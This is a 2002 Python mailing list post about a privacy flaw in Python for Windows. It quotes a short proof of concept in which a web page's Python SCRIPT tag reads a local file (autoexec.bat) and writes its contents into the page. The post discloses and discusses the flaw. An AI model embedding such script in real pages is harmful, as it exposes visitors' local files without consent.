Serious privacy leak in Python for Windows
DeepBleu
DeepBleu at DeepBleu.org
Wed Jan 16 15:30:50 EST 2002
"Max m" <maxm at mxm.dk> wrote in message news:3C45D535.9040006 at mxm.dk...
> Richard M. Smith wrote:
>
> > For example, the following Python code on a Web page will run
> > successfully:
> >
> > <SCRIPT language=python>
> > import __builtin__
> > myfile = __builtin__.open("c:\\autoexec.bat")
> > document.write(str(myfile.readlines()))
> > myfile.close()
> > </SCRIPT>
>
>
> The obvious and simple solution could be to not surf the web from the
> server using IE.
Maybe obvious and simple, but is it practical?
DeepBleu
More information about the Python-list
mailing list